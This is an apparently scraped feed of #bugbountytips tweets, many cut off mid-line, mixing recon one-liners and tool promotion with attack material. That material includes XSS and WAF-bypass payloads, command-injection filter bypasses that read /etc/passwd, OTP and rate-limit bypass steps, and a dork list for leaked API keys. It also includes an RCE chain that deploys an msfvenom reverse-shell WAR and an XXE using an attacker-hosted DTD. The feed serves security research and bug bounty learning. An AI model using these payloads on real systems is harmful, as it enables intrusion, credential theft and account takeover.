https://t.co/yDS86kXO3h
{..}
#bugbountytips
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
#programfolback #tutorial #code #opensource
RT @SalahHasoneh1: Top 10 - GitHub Dorks for Finding API Keys
Rebuilt in a better way
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @roughwire: Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-ad
Triaged with "High" instead of "Critical" . Don't know what is wrong !
#bugbountytips Tweet has tip as well :D
RT @laud3b: Shellshock still work for some server you can also try
nmap script.
nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty https://t.co/hWfe6AZWsi
RT @D4Vinci1: Just published a script that fingerprints BigIP servers in a given list of dom
link:
https://t.co/ua0FR2xwrm
#bugbounty
#bugbountytips
#Pentesting #bigip #F5 https://t.co/OqbegbmIOF
RT @manas_hunter: Bypassing 2FA with CSRF.
Apply this for easy bounties:)
#bugbountytips https://t.co/yKdQmwloNq
RT @K4r1it0: shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,po
#bugbountytips
#bugbountytip https://t.co/nMahaMlFTt
RT @intigriti: Want to find critical bugs by changing a single header? Do just like @hacke
RT @_mkahmad: Account Takeover by JWT Token forging by me :) #bugbountytips #bu
RT @fuxksniper: GraphQL — Common vulnerabilities & how to exploit them:
https://t.co/gFbaCcFUhD
Understanding Graphql :
https://t.co/v57mt8ZAsf
Some good graphql stuff
(Not by me)
#bugbountytips #bugbountytips
RT @D0cK3rG33k: GitHub Dorks for Finding API Keys, Tokens and Passwords
api_key
“api keys”
authorization_bearer:
oauth
auth
authentication
client_secret
api_token:
“api token”
client_id
password
user_password
user_pass
passcode
client_secret
secret
password hash
OTP
user auth
#bugbountytips
RT @AldenAous: Account Takeover tips 👀👍🏻
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/hhKW
RT @TheHackersNews: Watch Out 🔥
Hackers are abusing #Google Analytics service to bypass CSP web-security feature and
Learn how it works — https://t.co/82qxzATWCR
#infosec #cybersecurity #bugbountytips #bugbountytip https://t.co/R5XyQwU5mk
RT @intigriti: Excellent e-mail address payloads by @securinti! 🤯
Rewatch "You've got pwned: exploiting e-mail systems" at #NahamCon here: https://t.
RT @cry__pto: Tutorial on privilege escalation and post exploitation tactics
in Google Cloud Platform environments:(PDF) 66 PAGES:
https://t.co/6LGDGTiI0m
#PenTest #Hacking #bugbountytips #redteam
RT @ADITYASHENDE17: https://t.co/kotXpSr6G8 /plugins/servlet/oauth/users/icon-u
I always fuzz target name with my site name to gain SSRF AWS metadata.
Thanks to @D0rkerDevil SSRF write-up.
Remaining Google it
#bugbountytips #kongsec
RT @daoud_youssef: one line bash script to get every domain on specific IP
curl -s -k -X $'GET' -H $'Host: https://t.co/L2UFEqV7P7' --url 'https://t.co/nxZ1TBmTS
#bugbountytips #bugbountytip @rapiddns
RT @pdiscoveryio: #httpx v0.0.7 updates:-
☑Added TLS Probe (Subdomains from SSL)
☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length
https://t.co/baW40ThDCi
#hackwithautomation #bugbounty #security #bugbountytips https://t.co/caIs5Uz6Tu
RT @mirhatx: Bash code for manual subdomain takeover testing:
cat subdomains.txt | xargs -n1 dig @1.1.1.1 | grep -A10 NXDO | grep CNAME
#BugBounty #bugbountytips #bugbountytip @hacktivist1337
RT @0x0Cj: Yay, My first writeup
I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
https://t.co/N4gSywXvx4
RT @safe_buffer: Wait !! Are you serious? are you going to help ppl to learn smt could re
RT @AldenAous: 🚀 CORS Protection RegEx Bypass 🚀 by:@trbughunters
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
RT @HusseiN98D: As per the vote results, here you go!
A cool XXE resulting from a SSRF found on local company website during a pentest. DMs
#bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
How to Bypass The Rate limiting✌️✌️
Add this header in to the post request with an IP address.
X-Forwarded-For: (Any IP Address )
#bugbountytips #bugbounty #vulnerability #Hackers #exploit
RT @ITSecurityguard: Massive shoutout to https://t.co/ZgPbPhhgY5 for creating https:/
it is exactly what most of you people are looking for 😍
#recon #bugbountytips #BugBounty #AutomationAnywhere
RT @heald_ben: Easy way to find exposed production code:
1. Find a Gitlab hosted sub domain, usually named “code.domain” or “gitlab.domain”
2. Even if login is required, try the
“/snippets” endpoint.
3. View internal source code snippets.
#bugbountytips #bugbounty #bugbountytip
RT @11xuxx: RCE on big company
1. subdomain enum
2. used "ffuf" and found tomcat on ";/..;/manager"
3. weak cred (used hydra)
4. "/manager/html" blocked, "/manager/text" was not
5. used "msfvenom" and created reverse shell war
6. used "curl" and deployed the war file
7. rce!
#bugbountytips https://t.co/AfCqUVXyuK
RT @_Rutik_Sangle_: Finally today I completed the #100daystolearnandimprove challe
journey ahead.
Thanks to all
RT @HusseiN98D: An overview of what I did for my recent $10 000 bug. Always go for th
RT @roughwire: Running @pdnuclei on multiple template and don't want to see informat
cat nuclei-out.txt | grep -v -e templateid1 -e templateid2
#bugbounty #bugbountytips
Subscribe to our Telegram Channel for Hackdoor Cyber Security Events and Webinars In
🤖🤖🔥🔥👾👾👇👇👇
https://t.co/sqSFXdEOmM
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
I just published How I was Able To bypass Cloudflare WAF https://t.co/YBl9gMLUB0
#bugbountytips @_abhichimbalkar @deep803937 @chevonphillip @dybtron
Sublist3r is a tool designed to enumerate subdomains of websites. It helps penetration t
https://t.co/20u5jZOPaR
#cybersecurity #hackingtools #bugbountytips https://t.co/3TLqEVmFaV
RT @AmitMDubey: This little command will get all the Wayback endpoints to compare it
Tools -
waybackurls & unfurls by @TomNomNom
httpx by @pdiscoveryio
(I know it can be further optimized)
#bugbounty #bugbountytips #bugbountytips https://t.co/oBT5LNjmk6
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/othzLzOqx1
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/ZVrslIQtoM
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/ALXAVUiIf7
RT @11xuxx: XXE
1. change password func -> JSON
2. converted to XML -> 200 OK
3. created dtd file on my ec2 and started webserver on port 80
4. crafted a XXE payload!
5. bounty!
Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change th
#bugbountytips https://t.co/37JBcasx8h
Two good articles about HTTP Request Smuggling.
1.https://t.co/trsGgcBCOg
2.https://t.co/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @pdnuclei: Here is a #tip for using nuclei for a given list of subdomains, Nuclei accep
#bugbountytips https://t.co/C0pZpelj8z
RT @F3RR4R1_R3D: Why am i just now reading this? Anyways good recon methodology
RT @KomodoGT: I had some spaghetti last night this is what I found this morning. #bug
RT @rnd_infosec_guy: #bugbountytip
Don’t propagate bug bounty as a reasonable job model. It is the same as saying everyon
#bugbountytips #infosec #BugBounty
RT @ssh0x00r: Do we need to know JavaScript to get started in bug bounty?
#bugbountytips #hacking #infosec #hackerone
RT @chiraggupta8769: Awesome Tip By @intigriti And Tool By @sratarun #bugbountytip
RT @_YashGoti_: Need to automate your recon process with telegram chat here you go.
#bugbountytips
#recon
#automate
https://t.co/ZGU4fp0W5q
RT @krizzsk: A small but effective way to recon and get internal subdomains to increase
RT @dynamicCISO: With @HarshBothra_, we have delivered a great session on #Offensi
Video: https://t.co/YPfGj2ppYE
Slides: https://t.co/2ntCYwZYwH
@rneelmani @hacback17 #infosec #bugbountytips #bugbounty #girlswhocode #Linux
RT @HackerOn2Wheels: Bypass I learned from @rene_kroka this week:
https://t.co/SzIavQtyOR
onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,
👆 = alert(1)
#bugbounty #bugbountytips
RT @Ranger_one_: Great Resource for Template Injection!
https://t.co/gT3WvtEi3I
https://t.co/rVSOBfkZUu
https://t.co/CZsbChIJ7a
#bugbountytip #bugbountytips #bugbounty
RT @Faeeqjalali: OTP bypass .
Checked the response with entering wrong OTP.
Changed status from "invalid otp " to
"Valid otp".
BOOM.... P3
#bugbountytips
#bugbounty
#infosec
RT @hsakarp_ilajna: Things you should Gather: #Osint :
metadata
organization’s employees
Phone numbers
Open hours and holidays
Key employees
job offers
Partner companies
News
which CMS the target is using.
Hidden directories
Leaked Info
open ports
software version
#bugbountytips #bugbounty
🧮 Top 25 Local File Inclusion (LFI) Parameters
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
⛓️Get Reflected XSS within 3 minutes ⛓️by:@gkhck_
https://t.co/ZSGoyAvqdo
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @ja1sharma: Bash Script to scrape spring applications via Shodan and enumerate se
Usage: ./springShodanBash.sh <redact>
Output: <redact-Spring_FFUF.txt>
>:https://t.co/zFNiw1F1SD
Any suggestions are welcome.
Credit: @K4r1it0 @Madrobot_
#bugbounty #bugbountytips https://t.co/YWVbXwACTN
It was a fantastic session loaded with lots of live examples. Thank you so much, @harsh
Video: https://t.co/hu5Qw0J18i
Slides: https://t.co/pOIyo27sbC
#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #
RT @Virdoex_hunter: Bug bounty fast hunting find all subdomains using all tools and the
It was great to have a talk with @dynamicCISO. In case if you missed, find my slides &a
Slides: https://t.co/d77RbZXwqG
Stream: https://t.co/vrILyaZoLj
Thanks, @hacback17 for carrying this out.
#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd
RT @_ayoubfathi_: Ran into an API subdomain with an empty response?
You may get lucky and fetch the full API spec by hitting the following endpoints:
/swagger-ui.html
/swagger/swagger-ui.html
/api/swagger-ui.html
/v1.x/swagger-ui.html
/swagger/index.html
...
#bugbountytips #bugbounty #hackerone
RT @chiraggupta8769: Top 25 Remote Code Execution (RCE) Parameters by @trbughunt
#bugbountytips #bugbountytip #bugbounty https://t.co/XKItUZGzAx
RT @harshbothra_: Easily find exposed secrets from Github and Identify manually if they
#bugbountytip #bugbountytips #bugbounty #security https://t.co/vYPGFPW2lF
RT @th3hokag3: BUG BOUNTY TIP:
#bugbountytips #bugbounty #bugbountytip #cybersecurity #infosec https://t.co/QpJa
RT @cyanpiny: #bugbountytips https://t.co/sd2j3XrAoH
CloudFlare Origin Certificate
How to find out the real server IP hidden behind the Cloudflare CDN
443.https.tls.certificate.parsed.subject.common_name: CloudFlare Origin Certificate
#bugbountytips #bugbounty
RT @SalahHasoneh1: Manipulation of email by Latin letters
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
What I consider the top two learning and testing books for #pentesting and #bugbounty
#cybersecurity #bugbountytips #penetrationtesting
https://t.co/d9bPjpqcxH
RT @AldenAous: Second medium blog-post:
Stealing your Paytm information using XSS by: @VirenPawar_
https://t.co/fPs3KiXFL0
#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring
🚀💡 XSS from another level 💡🚀
https://t.co/YFIsP4lt9K
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec
RT @ehsayaan: If you found some api key or secret key then these are some tips to Esca
#BugBounty #bugbountytips https://t.co/5NjdDA1D4D
RT @pwn0sec: https://t.co/D5AYcIaVmU
#bugbounty #bugbountytips #vulnerabilityanalysis #Flutter
RT @chiraggupta8769: A small Burpsuite trick which helped @amitmdubey to find Blind
Step 1: Use Intruder to Bruteforce Headers
Step 2: Add Burp collaborator URL as value
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use Tarborator Extension to monitor hit
#bugbounty #bugbountytips https://t.co/KN0QuuZkyO
RT @faizalabroni: 1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
2. found https://t.co/dxxS1HALdy
3. clone & use https://t.co/87gxJisJNN
4. ./svn-extractor.py --url https://t.co/YrfE7sv51h --match database.php
5. result in output dir and just open it
#bugbounty #bugbountytips https://t.co/nNVCsstLny
RT @terjanq: I recently discovered a fancy way to execute arbitrary XSS without parenth
https://t.co/K0ebjvpmxq
#javascript #bugbountytips #xss https://t.co/7848wYvnU2
RT @r00t98: Bypass rate limit to account takeover
1. Server limited brute force OTP by ip.
2. Install & config ip rotate(burp suite extender).
3. Send password reset code.
4. Brute force OTP with intruder.
5. Change password.
#bugbountytip #bugbountytips
RT @bountyhunter_fr: Here is a way to escape a restricted shell in linux
#bugbountytips
What would you have done to escape a restricted shell? https://t.co/BzI7PLslmb
comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains
#bugbountytips #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity
⏰Reflected XSS on Sony with Google Dork & Akamai WAF Bypass ⏰
https://t.co/raJdKzYbqt
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @hsakarp_ilajna: My #twitter and #linkedin feed is flooded with Bug Bounty tips Tw
#bugbountytips #cybersecurity #LinkedIn #bounty #hacking #bugs #vulnerabilities #b
RT @BugBountyRecon: What should you look for when attacking OAuth2?
A nice overview: https://t.co/TtbQrQmuBS
#bugbountytips #BugBounty
RT @arkadiyt: I've added Intigriti and YesWeHack support to my bounty-targets-data cr
Happy hunting: https://t.co/IPZbv0yBUs #bugbounty #bugbountytips
RT @AldenAous: Ways to bypass rate limit
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @trbughunters: Top 25 Remote Code Execution (RCE) Parameters
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | #follow Java
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #USDT #Bitcoin #coding #bugbountytips #bughunting #tipsandtr
RT @m4ll0k2: https://t.co/eD8AUajPQw - Simple Python tool for find a unique words in
#bugbountytips https://t.co/TIjT5Trvkd
RT @taaminz: Access to internal company info
1. Find an internal dev domain using https://t.co/CbAoq9VFF4
2. Subdomain enumeration on internal domain
3. Find internal API subdomain
4. API key and endpoint in javascript file
5. Access to internal info
#bugbountytips #bugbounty
RT @pdnuclei: #oneliner
✅ Subdomain enumeration
✅ Full port scan
✅ HTTP web server detection
#security #bugbountytips #portscan #subdomain #chaos https://t.co/Xqm5MZdnuY
RT @chickflow0: when your report is duplicated and closed as N/A!
@Hacker0x01 - keep hunting!...
#hackerone #togetherwehitharder #bugbounty #bugbountytips #vulnerabilityanalysis #
RT @BeingjokerMeme: JSON Web Tokens | Authenticating single page apps using JWT |
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @GainSec: How Install CloudGoat on Ubuntu Server
-
-
🤓 Follow @gainsec
-
https://t.co/OCOXHP5m3Z
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
RT @MeetAn0nym0us: Just published an Article on Android Apps Pen-testing.
Don't forget to share your thoughts on it.
Thanks!
https://t.co/a1pno2oioa
#BugBounty #bugbountytips #TogetherWeHitHarder #hackerone #ItTakesCrowd https:
RT @naglinagli: Google dork for CVE-2020-3452
'inurl:logon.html "CSCOE"'
(It will find exposed Cisco SSL-VPN domains, not 100% of them are vulnerable, but mos
After reaching a login page, try one of @aboul3la POC's
#bugbountytips https://t.co/GDXV3oZDwA
RT @black_hat_india: Disclosing user's sensitive information like phone number, tokens
Captured login request via BURP.
/hub/v1/user/otp/[email protected]
/hub/v1/user/otp/[email protected]
/hub/v1/user/otp/[email protected]
#bugbountytips #infosec
RT @black_hat_india: LFI to RCE
1. ffuf on "/" -> "redacted-api" -> 302
2. ffuf on "redacted-api/" -> "application.wadl" -> 200
3. all operations were auth protected
4. didn't give up and tested ~200 operations
5. found LFI, no auth
6. admin creds in plaintext, logged in and got RCE
#bugbountytips https://t.co/unotYtxeWY
RT @dwisiswant0: FinDOM-XSS - Find for Possible DOM Based XSS Vulnerability
https://t.co/Q7MU6pgIsU
Inspired by @dark_warlord14 by JSScanner tool, and @aslanewre with the possible patt
#bugbounty #bugbountytips #infosec https://t.co/jcSd4vtGpD
RT @11xuxx: Twig SSTI
1. Submitted {{7*7}} and received "you password is: 49"
2. Tried "registerUndefinedFilterCallback" func, it was blocked by Imperva WAF https://
3. read Twig source code and found "registerUndefinedFunctionCallback"
4. WAF bypassed and RCE!
#bugbountytips https://t.co/hXtPdo9Kkp
RT @black_hat_india: subfinder -nW -silent -t 25 -d $DOMAIN | shuffledns -silent -d $DO
Some crazy oneliners possible for subdomain discovery
#bugbountytips
RT @Yumi_Sec: An interesting trick: you can bypass a WAF during a XSS attack on ASP(d
#BugBounty #BugBountyTips #InfoSec
(Credit to Acunetix)
Full article: https://t.co/Eq2nl9cyQ6 https://t.co/yy3tuRHDbq
RT @iambeingjoker: JSON Web Tokens | Authenticating single page apps using JWT | Ho
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @pwn0sec: Pwned @andripwn - Bypassing WAF XSS with language
/></noscript></form><script language="javascript">window.alert(1
#xss #bypasswaf #bugbountytips #bugbountytip #penetrationtesting https://t.co/3fJm
RT @andripwn: Bypassing WAF XSS with language
/></noscript></form><script language="javascript">window.alert(1
#xss #bypasswaf #bugbountytips
RT @andripwn: Waf Bypassing SQL-Injections DIOS
Leads to Recon Find Cpanel Login
#bugbountytips #bypassWaf #hackerone https://t.co/T317tT3gkb
RT @Hxzeroone: #Bugbountytips
If you’re testing a website which lets you use your account on Xbox/Setup Tv.Visit hxxp
https://t.co/gnZry4m4Wl
RT @trbughunters: Top 25 SQL Injection Parameters for @trbughunters
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @trbughunters: ☠️ Top 25 Server-Side Request Forgery (SSRF) Dorks ☠️
Note: The popularity of dorks can vary.
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @andripwn: Bug Bounty GitLab : Stored XSS in Wiki pages
Status : Patched
Writeup's here::
https://t.co/9ayVoenny5
#bugbounty #bugbountytips #hackerone #gitlab
RT @xalerafera: If you find the host hosting the WordPress CMS, then try to see, if xmlrp
Then, through the PingBack function, you can get Blind SSRF)
#bugbounty #hackerone #bugbountytip #bugbountytips https://t.co/82mOpzrXCo
RT @bendtheory: just learned about ffuf’s response size filter -fs
super useful when a site returns 200 for bad paths instead of 404’s. you can even set a r
friendship ended with dirbuster
now ffuf is my best friend
#bugbountytips
RT @jdksec: Need a quick way to request 1000's of URLs in burp without crashing your b
cat yahoourls.txt| parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
#bugbounty #bugbountytips #bugbountytip https://t.co/61yAw3qCLk
RT @Th3G3nt3lman: P1 of the day on @Bugcrowd :
1- https://host =>403 forbidden
2- https://host/app =>Redirect to corporate SSO
3- https://host/app/main.js =>IP:8005 and Api_key
4- https://IP:8005/ => https://IP:8005/swagger/ui/index#/Admin
5- Use key in swagger=> Info Disclosure
#bugbountytips
RT @IfrahIman_: Want to find some new subdomains for your target?
Use SecurityTrails API 🔥 to enumerate.
#bugbountytips https://t.co/vHq8M1wBC5
RT @bendtheory: XSSI example PoC to fix JS undefined/type errors
<script>
x = function(y, z) { };
prof = {'manager': {'load':null, 'fn':x}}
prof.manager.load = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://t.co/kDPMJMFetz"></script>
#bugbountytips
RT @bendtheory: #xss payload for when
1. a parameter is reflected in javascript
2. it’s being inserted into the DOM via innerHTML
3. HTML encoding and not Javascript encoding is used
4. WAF blocks common payloads
\x3Ctextarea+onauxclick\x3Dconfirm(1)\x3Eright+click+here
#bugbountytips
RT @laud3b: Finding for API keys, Tokens and Passwords with Github Dorks
#bugbounty #bugbountytips https://t.co/lOS0parDCn
RT @mase289: I just published The $1,000 worth cookie
A story of DOM XSS in https://t.co/GqkQXyBLmG
https://t.co/kYEijPwppN
#BugBounty #bugbountytips #xss
RT @AldenAous: - SQL'injection with WAF ByPass
If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/HNM
RT @chiraggupta8769: Account Takeover By JWT Token Forging By @_mkahmad
#bugbountytips #bugbounty https://t.co/H4uup4L6iE
RT @trbughunters: ⛓️Get Reflected XSS within 3 minutes ⛓️
@gkhck_ from our community, wrote a write-up about the xss recon methodology!
https://t.co/FukL4nlNvc
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @praseudo: Want to know which web files on a website are cached? Here is an online
https://t.co/YQJaWQBEps
#bugbounty #bugbountytips #hacking #Recon #recontips #bugbountytools https://t.co
RT @niravsikotaria: Dear @pdiscoveryio 😍
Thanks for "httpx" tool works like Jet Plane🚀
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips #httpx
RT @m4ll0k2: Simple tool for get domain relationship.. https://t.co/MuLnPJH5SQ - @Jha
RT @harshbothra_: Simple Oneliner to Filter out Domains with "200 Status" and further
cat domains.txt | httpx -follow-redirects -status-code -vhost -threads 100 | sort -u | gre
#bugbountytips #bugbounty #security #infosec
RT @harshbothra_: Found an API Key/Secret/Token - Not Sure whether to report it or n
@udit_thakkur Thanks for a good tool ;)
#bugbounty #bugbountytip #bugbountytips https://t.co/LFEbSVE9PN
RT @gwendallecoguic: #onliner to extract endpoints from JS files of a given host #BugB
Regexp dependent so highly improvable!
https://t.co/4kBajZpIV8 https://t.co/T7F7tYaG0Q
RT @pdnuclei: Here is how you can use #httpx to import a list of
a) URLs
b) Subdomains
c) Endpoints
to Burp suite for further crawling or scanning.
#bugbountytips #pentest #security #hackwithautomation #burpsuite https://t.co/jjxcK
RT @AbhishekKarle3: I just published How I was able to change victim’s password using
Thanks to @musiclouderlml for sharing #bugbountytips
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @Tismayil1: Imperva Waf XSS ByPass :
Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9
Codepen : https://t.co/0ot0RTvp39
#BugBounty #BugBountyTip #BugBountyTips #WhiteHats https://t.co/kFIWRcOQWW
RT @Random_Robbie: <?php var_dump(explode(',',ini_get('disable_functions'))); ?>
Handy as hell tip for checking which functions you need to bypass on PHP RCE.
#bugbountytips #bugbountytip
RT @hacktory1: 6 steps and 2 tools to attack JSON Web Token
https://t.co/uRHKNn6pSW
https://t.co/PBDNgsjLnh
#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec
RT @chiraggupta8769: one-liner to extract endpoints from JavaScript files by @renniepa
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s
#bugbountytips #bugbountytip #bugbounty https://t.co/xk345N4yXN
RT @SalahHasoneh1: Way to bypass 2FA
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @vNature0: Could you please recommend tools/scripts to test for known vulnerabilit
My website has been receiving some attempts of doing random stuff from Russia so I wa
Thanks!!
#bugbountytips #bugbountytip
RT @roughwire: Duplicates specially RCE on bugbounty program makes you feel hell.
#bugbountytips never check your hackerone notification before going to bed specially w
RT @dark_warlord14: New write up around ffuf to help you speed up few things during p
Blog: https://t.co/NucgVotBwn
I hope it helps you in someway. Retweet if you like. Happy Hacking!!
#bugbounty
#bugbountytips https://t.co/K9MPwR3EX8
RT @MrrFawadkhann: Eid Mubarak to everyone
#bugbountytips #BugBounty
RT @Tismayil1: Yes I awarded 5000$ in Private Program.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty
- SQL'injection with WAF ByPass
If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly. https://t.co/wj82tcFJXb
RT @11xuxx: Using ffuf the right way and gaining admin access
1. "ffuf -u ... --mc all" -> match all response codes
2. ctrl+c after 5 sec
3. "ffuf -u ... --mc all -fw ..."
4. found a backdoor developer used to login as admin (response code 404)
all credits goes to @joohoi
#bugbountytips https://t.co/0id7geVEyE
Once I realized the trick to @adamtlangley's "I once was blind but now I RFC" challenge
TIL @PortSwigger's Burp Collab does SMTP!
This is insaaanely useful.
#bugbounty #bugbountytips https://t.co/1Xdo79FEUG
RT @shreyasrx: Command injection 💥
Filter Bypasses >
1/3
cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's'swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()sswd
#bugbountytips
#shieldindia
#commandinjection
RT @abhishake100: I just published "Bug Bounty in Lockdown (SQLi and Business Logic
#bugbounty #bugbountytips
https://t.co/MbpxArExBD
RT @CristiVlad25: Tools for #bugbounty hunters. With @InsiderPhD
#bugbountytips #bughunting #ethicalhacking
https://t.co/SAJb6TjKMm
RT @D0rkerDevil: Escalated a blind Python code injection to RCE, thanks to @imhaxormad for the help.
another #DNS_BASED_EXFILTRATION
just decode the output from base64
and you will get
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/
#bugbounty #dnsexfil #bugbountytips https://t.co/YYr8H5h6Qz
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
Top 25 Remote Code Execution (RCE) Parameters
#bugbountytips #bugbountytip #bugbounty https://t.co/2JI8LraxWV https://t.co/uL0
Ways to bypass rate limit
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @sh0mbo: Need to trigger that xss payload, but parens are filtered? EZ!
Function`return alert````${document.cookie}`
#xss #payload #filterevasion #bugbountytips #bugbounty
RT @joeldeleep: A good way to run linkfinder if you have a list of js files #infosec #bugb
RT @Tismayil1: Yes I earned $3180.
Tools:
Sub Scanner: https://t.co/LegySAU3sZ
Dir Scanner: https://t.co/1L6MutcaEc
Git Dumper: https://t.co/IOsHlTWCP2
#BugBounty
#bugbountytips
#bugbountytip
#whitehat
#infosec https://t.co/6Qy1JEiDWM
RT @Tismayil1: I Earned $XXXX OS Command Injection Private Program.
Used Repos
1: Dir Searcher: https://t.co/1L6MutcaEc
2: Sub Scanner: https://t.co/ZRcZb6ovUa
#BugBounty
#bugbountytips
#bugbountytip
#whitehat https://t.co/OPOc6mVkTc
RT @_0nk4r_: Subdomain Takeover 101 ..@EdOverflow Great Blog
learn a lot
https://t.co/xAHIs10wiQ
----
#togatherwelearn #bugbountytips
Here is a way to escape a restricted shell in linux
#bugbountytips
What would you have done to escape a restricted shell? https://t.co/BzI7PLslmb
RT @SatyamGothi: #bugbountytips for sure💯
A M A Z I N G #bugbountytips #bugbountytip #infosec https://t.co/sOAjMOXHt5
RT @d3tonator: Rate limit bypass:
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwarded-Host: IP
If the bypass is successful and after a while requests get blocked again, increment the last oct
#infosec #bugbountytips
RT @d3tonator: Easy Money | P3 MAP API | Android
1. Open the APK in jadx-gui
2. Go to Resources.arsc > res > values > strings.xml
3. Here you'll find the Google Maps API key
4. Open the URL https://t.co/1dNXVN63B4{API_Key}
If the map opens, report it.
#BugBountytips #Android #bugbounty #infosec
Wanna know the best way to be demotivated in the bug bounty field?
Compare yourself with others!
#bugbounty #bugbountytips
RT @InonShkedy: A series of articles I wrote about major changes in app development (
1: Modern vs. Traditional apps:
https://t.co/GUGjFHQWDR
2: What is Modern AppSec:
https://t.co/ewbpqgZFC9
#bugbountytips
RT @farah_hawa01: NEW VIDEO: In this video, I talk about SAML authentication, SSO’s,
https://t.co/erMuqop3vc https://t.co/iAU9QSV0nO
RT @s3rgiomazari3go: Some of the resources most of the professional people recommen
1.https://t.co/SveHxbs2Nr
2.https://t.co/I8colHHkwB
3.https://t.co/eMCUzhjaqf
#bugbountytips
RT @VirenPawar_: Second medium blog-post:
Stealing your Paytm information using XSS
https://t.co/0UqAhWbzzl
#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring
RT @amad3u6: You can specify memory size for @Burp_Suite to make it more smoother
~$ java -jar -Xmx3072M /path/to/burpsuite.jar
or
~$ java -jar -Xmx3G /path/to/burpsuite.jar
#bugbountytips #bugbountytip #bugbounty #infosec
RT @HossamSec: To test XSS + SQLi + SSTI/CSTI with the same payload use :
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for Sql injection
"><svg/onload=prompt(5);> ==> for XSS
{{7*7}} ==> for SSTI/CSTI
#bugbounty #infosec #TogetherWeHitHarder #bugbountyprotip #Pentesting #bugboun
RT @ajdumanhug: I'll tag #BugBountyTips to notify #SecurityResearchers. Go check out
RT @SalahHasoneh1: Extract endpoints from APK files
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
#bugbountytips #BugBounty https://t.co/7pxhZ6gRgo
https://t.co/IqiCVzbCkd MR r0b0t.clip >>> #blockchain #opensource #linux #
Recon tip for:
